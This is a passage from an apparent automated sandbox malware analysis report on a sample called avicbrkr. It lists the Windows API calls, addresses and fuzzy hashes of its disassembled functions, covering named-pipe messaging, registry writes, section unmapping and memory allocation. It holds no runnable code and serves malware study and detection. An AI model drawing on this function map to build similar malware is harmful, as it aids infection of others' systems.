                        • Part of subcall function 00372C81: GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037227B
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372297
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$lstrlen$AllocateErrorLast$CallCloseHandleNamedPipeSwitchThreadlstrcpymemset
                      • String ID:
                      • API String ID: 1768699481-0
                      • Opcode ID: 04b900274c3a285713132bfe98f5d90173ae09ecbef950726d7656ad902a8b57
                      • Instruction ID: 55ffb8fb11d638fa85c218a293d12919192767e0acc220b04c274032fe40fa58
                      • Opcode Fuzzy Hash: 04b900274c3a285713132bfe98f5d90173ae09ecbef950726d7656ad902a8b57
                      • Instruction Fuzzy Hash: 22518A32508301AFC722DF25DC45B5BBBE8FF88314F04892EF599922A0E739D945CB92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037BE82, Relevance: 15.1, APIs: 10, Instructions: 109pipesynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0037BEC2
                      • ConnectNamedPipe.KERNEL32(?,?), ref: 0037BEF2
                      • GetLastError.KERNEL32 ref: 0037BEFC
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0037BF20
                        • Part of subcall function 0037BC67: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0037BD73,00000008,?,00000010,00000001,00000000,0000012B), ref: 0037BC86
                        • Part of subcall function 0037BC67: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCBA
                        • Part of subcall function 0037BC67: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCC2
                        • Part of subcall function 0037BC67: GetLastError.KERNEL32 ref: 0037BCCC
                        • Part of subcall function 0037BC67: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0037BCE8
                        • Part of subcall function 0037BC67: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0037BD01
                        • Part of subcall function 0037BC67: CancelIo.KERNEL32(?), ref: 0037BD16
                        • Part of subcall function 0037BC67: CloseHandle.KERNEL32(?), ref: 0037BD26
                        • Part of subcall function 0037BC67: GetLastError.KERNEL32 ref: 0037BD2E
                      • CloseHandle.KERNEL32(?), ref: 0037BF8E
                        • Part of subcall function 0037BE02: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037BE20
                        • Part of subcall function 0037BE02: HeapFree.KERNEL32(00000000,00000000), ref: 0037BE74
                      • FlushFileBuffers.KERNEL32(?), ref: 0037BF63
                      • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0037BF6C
                      • WaitForSingleObject.KERNEL32(0039D29C,00000000), ref: 0037BF79
                      • GetLastError.KERNEL32 ref: 0037BF9B
                      • CloseHandle.KERNEL32(?), ref: 0037BFA8
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$CloseFileHandleWait$CreateEventHeapMultipleNamedObjectsPipe$AllocateBuffersCancelConnectDisconnectFlushFreeObjectOverlappedReadResultSingleWrite
                      • String ID:
                      • API String ID: 3492400467-0
                      • Opcode ID: 8cc66055c7aa90489f46bcefd6fe6a8763e19bbe663bf5c595f185c0b6011f2a
                      • Instruction ID: c61e84df5fcf9921354317327175be79fd1dbf71d14c94f24453691fb4d04adb
                      • Opcode Fuzzy Hash: 8cc66055c7aa90489f46bcefd6fe6a8763e19bbe663bf5c595f185c0b6011f2a
                      • Instruction Fuzzy Hash: FD318371118305AFD7129F78DC4996BB7BCFB48324F108A2AF569D21A0D7358D058F92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038BA07, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                      • CloseHandle.KERNEL32(?), ref: 0038BA3E
                      • CloseHandle.KERNEL32(?), ref: 0038BA4C
                      • RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                      • RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                      • Sleep.KERNEL32(000001F4), ref: 0038BA90
                      • CloseHandle.KERNEL32(?), ref: 0038BA9D
                      • LocalFree.KERNEL32(?), ref: 0038BAAB
                      • RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCriticalHandleSection$Free$DeleteEnterEventExchangeHeapInterlockedLeaveLocalObjectSingleSleepWait
                      • String ID:
                      • API String ID: 923018795-0
                      • Opcode ID: cd70977d81622420ee915f7657b3e2ada7f42eca7705f8fe204ae9232631ccdf
                      • Instruction ID: a8fd6040fd00a69fa2c637fcdd35f363c288325f236f80ec27fb67c084610ba6
                      • Opcode Fuzzy Hash: cd70977d81622420ee915f7657b3e2ada7f42eca7705f8fe204ae9232631ccdf
                      • Instruction Fuzzy Hash: 291149315147169BCB33BF69DC48A5BB7FDFF04701B05499AF692826A1CB3AE900CB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037DFBC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 161memorythreadsleepCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL ref: 0037DFF5
                      • memset.NTDLL ref: 0037E009
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 0037E098
                      • GetCurrentThread.KERNEL32 ref: 0037E0AB
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E14E
                      • Sleep.KERNEL32(0000000A), ref: 0037E158
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E17E
                        • Part of subcall function 0037DF75: NtUnmapViewOfSection.NTDLL(000001F4), ref: 0037DF9E
                        • Part of subcall function 0037DF75: RtlNtStatusToDosError.NTDLL(00000000), ref: 0037DFA5
                        • Part of subcall function 0037DF75: HeapFree.KERNEL32(00000000,00000000,000001F4), ref: 0037DFB4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapSection$memcpy$AllocateCloseCriticalCurrentErrorFreeStatusThreadUnmapViewmemset$EnterHandleLeaveQuerySleepValue
                      • String ID: pnls
                      • API String ID: 168089739-141991303
                      • Opcode ID: c712d47790550c9bb3e5aab333b9d383741bb485e9cd2230ed91e058cb3388db
                      • Instruction ID: 5eae6eb5a2769c3a1627e2bd2364fb459b3ceffa98e7858ad66ed54feaf7dd9d
                      • Opcode Fuzzy Hash: c712d47790550c9bb3e5aab333b9d383741bb485e9cd2230ed91e058cb3388db
                      • Instruction Fuzzy Hash: 435149B1904302AFD712EF68DC8691ABBE9FB4C300F40496EF598D7260D739D9488B92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389B83, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 138stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00389BB1
                      • StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                      • _strupr.NTDLL ref: 00389C38
                      • StrTrimA.SHLWAPI(?,?), ref: 00389C45
                      • StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00371314: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,0038BD54), ref: 00371324
                      • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTrim$Allocate$Free_struprlstrlenmemcpymemset
                      • String ID: pnls
                      • API String ID: 823183657-141991303
                      • Opcode ID: 7b2be427cb99386164858d3eb78390a269cdbfda553de9f5ce432a288f7a26ac
                      • Instruction ID: cbd3cba8d5c705dfae7b0385aa833c810c154b4dd239e47dd532b799869b4392
                      • Opcode Fuzzy Hash: 7b2be427cb99386164858d3eb78390a269cdbfda553de9f5ce432a288f7a26ac
                      • Instruction Fuzzy Hash: 5341B2726043069FD722EF29CC85B2BBBECEF58740F05085AF848DB242EB74D9058B61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00632BE1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$File$BuffersCloseFlushHandle
                      • String ID: !Cc
                      • API String ID: 1555849187-3374438881
                      • Opcode ID: 4188291a9d1e2349c4049be7f7b0e9b29018648dafa5be1a9f58e76bff2458d3
                      • Instruction ID: d235e3f11dc3c10c451a4e7252500e67d61605c9ec1e55d5459b02b306638d10
                      • Opcode Fuzzy Hash: 4188291a9d1e2349c4049be7f7b0e9b29018648dafa5be1a9f58e76bff2458d3
                      • Instruction Fuzzy Hash: A4313C71900219FFEB04DFA4CD45EBEBBBAEF48750F108165FA11E62A0D7709E419BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038B193, Relevance: 13.8, APIs: 9, Instructions: 278memorythreadCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0038B20A
                      • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0038B229
                      • GetLastError.KERNEL32 ref: 0038B3DA
                      • GetLastError.KERNEL32 ref: 0038B45C
                      • SwitchToThread.KERNEL32(?,?,?,?), ref: 0038B4A1
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • GetLastError.KERNEL32 ref: 0038B4D7
                      • GetLastError.KERNEL32 ref: 0038B4E6
                      • RtlEnterCriticalSection.NTDLL(?), ref: 0038B4F6
                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0038B507
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$AllocCriticalSectionVirtual$EnterExchangeInterlockedLeaveSwitchThread
                      • String ID:
                      • API String ID: 3432991976-0
                      • Opcode ID: d578d527fcf19b5d4611818725b47a5deca027b9e68b6c5c41f6ae7040566000
                      • Instruction ID: 02ae07037b9247c2842d3dd4883fbbd34846ebb99806aaa26fdf466950c8ab64
                      • Opcode Fuzzy Hash: d578d527fcf19b5d4611818725b47a5deca027b9e68b6c5c41f6ae7040566000
                      • Instruction Fuzzy Hash: EBA15DB150030A9FDB32AF62CC85AAABBBDFF08355F11456AF916D22A2D7719D44CF10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F08B, Relevance: 13.7, APIs: 9, Instructions: 242memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038E971: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E98D
                        • Part of subcall function 0038E971: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E9AB
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038EC4C: strcpy.NTDLL ref: 0038EC8A
                        • Part of subcall function 0038EC4C: lstrcat.KERNEL32(00000000,?), ref: 0038EC95
                        • Part of subcall function 0038EC4C: StrTrimA.SHLWAPI(00000000,003994B4), ref: 0038ECB2
                      • StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 00389722: lstrcpy.KERNEL32(00000000,?), ref: 0038974D
                        • Part of subcall function 00389722: lstrcat.KERNEL32(00000000,?), ref: 00389758
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 003918DD: memset.NTDLL ref: 0039191C
                        • Part of subcall function 003918DD: memcpy.NTDLL(?,00000204,?,00000000,00000000,?,?), ref: 00391929
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0037E4B7: lstrlen.KERNEL32(?,0039706C,00000000,00397050,?,?,?,?,0039D47C,00000001), ref: 0037E4D7
                        • Part of subcall function 0037E4B7: wsprintfA.USER32 ref: 0037E501
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      • HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                      • HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalFreeHeapSection$Leave$EnterTrimlstrcat$Sleeplstrcpylstrlenmemcpymemsetstrcpywsprintf
                      • String ID:
                      • API String ID: 1701921480-0
                      • Opcode ID: cc80babb61f4f6d8b6f7e7a329b3449d90043abd7b90b348bd44c4139c1dc771
                      • Instruction ID: 1c21e9cc7e1617c19ba48402cf4cee84a8f9f7629aa7d23006e4d9d25e598d90
                      • Opcode Fuzzy Hash: cc80babb61f4f6d8b6f7e7a329b3449d90043abd7b90b348bd44c4139c1dc771
                      • Instruction Fuzzy Hash: A5918B76244300EFD703EF69EC46E1ABBADFB48710F05056AF985972B1CB76E8048B55
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037AF2C, Relevance: 13.6, APIs: 9, Instructions: 124memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • RtlAllocateHeap.NTDLL(00000000,00000018,0039F241), ref: 0037AF62
                      • memset.NTDLL ref: 0037AF73
                      • lstrcmpi.KERNEL32(?,?), ref: 0037AFB3
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037AFDC
                      • memcpy.NTDLL(00000000,?,?), ref: 0037AFF0
                      • memset.NTDLL ref: 0037AFFD
                      • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0037B016
                      • memcpy.NTDLL(-00000005,0039E3F8,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0037B031
                      • HeapFree.KERNEL32(00000000,?), ref: 0037B04E
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$Heap$AllocateCriticalInterlockedSectionmemset$CloseCreateDecrementEnterFreeIncrementLeavelstrcmpi
                      • String ID:
                      • API String ID: 4031990062-0
                      • Opcode ID: 2cdc5d42ea60fe2adfb58a038e7b804446b4a31d5ebd414bf261f0f04d780dca
                      • Instruction ID: 6082471fb20f4239f01e1560b618b28f510d18287dc2892297400f9e888c6b12
                      • Opcode Fuzzy Hash: 2cdc5d42ea60fe2adfb58a038e7b804446b4a31d5ebd414bf261f0f04d780dca
                      • Instruction Fuzzy Hash: F841AC72E00209EFDF229FA0CC85B9EBBB9FB44350F118429F519B7290D7799E449B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037164D, Relevance: 13.6, APIs: 9, Instructions: 90memoryregistrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlImageNtHeader.NTDLL(?), ref: 0037165E
                      • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00371685
                      • GetTickCount.KERNEL32 ref: 0037169C
                      • wsprintfA.USER32 ref: 003716AC
                      • RegCreateKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003716E0
                      • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 003716FB
                      • lstrlen.KERNEL32(00000000), ref: 00371705
                      • RegCloseKey.ADVAPI32(?), ref: 00371721
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037172F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                      • String ID:
                      • API String ID: 3389039979-0
                      • Opcode ID: a696c51f9e362a2796802a84ec75bfa735c37ac2a56f4c6f51031a98bc853311
                      • Instruction ID: 97258f1cd84ee91f6f1585f65418b066cf97a541feeaae214a69c4b9b88297d7
                      • Opcode Fuzzy Hash: a696c51f9e362a2796802a84ec75bfa735c37ac2a56f4c6f51031a98bc853311
                      • Instruction Fuzzy Hash: B7217C72501258BFDB22AFA4DC88DAF7F7CEF45394F004026F90996260DB768E51DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037BC67, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0037BD73,00000008,?,00000010,00000001,00000000,0000012B), ref: 0037BC86
                      • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCBA
                      • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCC2
                      • GetLastError.KERNEL32 ref: 0037BCCC
                      • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0037BCE8
                      • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0037BD01
                      • CancelIo.KERNEL32(?), ref: 0037BD16
                      • CloseHandle.KERNEL32(?), ref: 0037BD26
                      • GetLastError.KERNEL32 ref: 0037BD2E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                      • String ID:
                      • API String ID: 4263211335-0
                      • Opcode ID: 04b342186777b058119616f5963b380cda52d31fd2c515f62948fcfcd5c792d9
                      • Instruction ID: 460e30d75f6d2735c95aabee80557010475b2c29ef91d3adcd514e774e144314
                      • Opcode Fuzzy Hash: 04b342186777b058119616f5963b380cda52d31fd2c515f62948fcfcd5c792d9
                      • Instruction Fuzzy Hash: 53217F72900119BFDB239FA4DC48AEEBB7DEF48350F01C426F909D6290D7358A44CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00631227, Relevance: 13.6, APIs: 9, Instructions: 78registrymemorystringCOMMON
                      Download Yara Rule
                      APIs
                      • PathFindFileNameW.SHLWAPI(0063618C), ref: 00631249
                      • lstrcmpiW.KERNEL32(00000000,?,00637614), ref: 00631250
                      • RegOpenKeyExA.ADVAPI32(80000001,00638080,00000000,00000000,?,?,00637614), ref: 00631281
                      • lstrlenW.KERNEL32(?,00637614), ref: 00631295
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 006312AD
                      • RegQueryValueExW.ADVAPI32(?,00000000,00637614,00000000,00637614,?,00637614), ref: 006312CC
                      • StrStrIW.SHLWAPI(00000000), ref: 006312E9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 006312FE
                      • RegCloseKey.ADVAPI32(?,?,00637614), ref: 00631307
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFileFindFreeNameOpenPathQueryValuelstrcmpilstrlen
                      • String ID:
                      • API String ID: 2182914722-0
                      • Opcode ID: 338cdc7dbcc062b725d000f31414406fdd3e56fcdb0a481d7c88f9b93bd810c8
                      • Instruction ID: 6c74ef4adc72d55aab9491590307b1a3009b43a26e87f27ab9ca50f6f6eaa4d8
                      • Opcode Fuzzy Hash: 338cdc7dbcc062b725d000f31414406fdd3e56fcdb0a481d7c88f9b93bd810c8
                      • Instruction Fuzzy Hash: B8216B71904108BBDB219FA9ED49DABBFBAFF4A300B009068F905D2120DB314A00DBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00375124, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 187memorystringthreadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037D9D1), ref: 0037486B
                        • Part of subcall function 003747AC: WaitForSingleObject.KERNEL32(00000000), ref: 003748CF
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037D9D1), ref: 003748F8
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037B7D2), ref: 00374908
                        • Part of subcall function 003747AC: RegCloseKey.ADVAPI32(00000001,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 00374911
                        • Part of subcall function 003886D3: lstrlen.KERNEL32(?,00000000,0039CC00,?,00371953,?), ref: 003886DD
                        • Part of subcall function 003886D3: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 00388708
                        • Part of subcall function 003886D3: lstrcat.KERNEL32(00000000,?), ref: 0038874E
                      • lstrcmp.KERNEL32(?,?), ref: 0037519B
                      • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_0000408F,?,00000001), ref: 0037526D
                      • GetCurrentThread.KERNEL32 ref: 0037527E
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 0037191A: RegOpenKeyA.ADVAPI32(80000001,?), ref: 0037192E
                        • Part of subcall function 0037191A: RegCloseKey.ADVAPI32(?), ref: 0037195C
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 003752DC
                      • wsprintfA.USER32 ref: 003752ED
                      • lstrlen.KERNEL32(00000000,00000000), ref: 003752F8
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$Free$Closelstrlen$AllocateCurrentErrorThread$CallHandleLastNamedObjectOpenPipeSectionSingleStatusUnmapViewWaitlstrcatlstrcmpmemsetwsprintf
                      • String ID: R9
                      • API String ID: 2138848589-134138977
                      • Opcode ID: 436b0fff31a82a72872fc6614147d4b79f3bef9b5dcb8a832fed20113d8ba050
                      • Instruction ID: 60505a72faa05e35df0dd3058ac5c04f0110e19c31432b6608c5e707582dd382
                      • Opcode Fuzzy Hash: 436b0fff31a82a72872fc6614147d4b79f3bef9b5dcb8a832fed20113d8ba050
                      • Instruction Fuzzy Hash: 4E711871900609EFDF22EFA4DC45EEEBBB9FF08300F15845AE505A7260E776AA41DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B206, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 174memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0038939D: GetLocalTime.KERNEL32(?), ref: 003893A7
                        • Part of subcall function 0038939D: wsprintfA.USER32 ref: 003893D3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      • wsprintfA.USER32 ref: 0037B33D
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B382
                      • InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
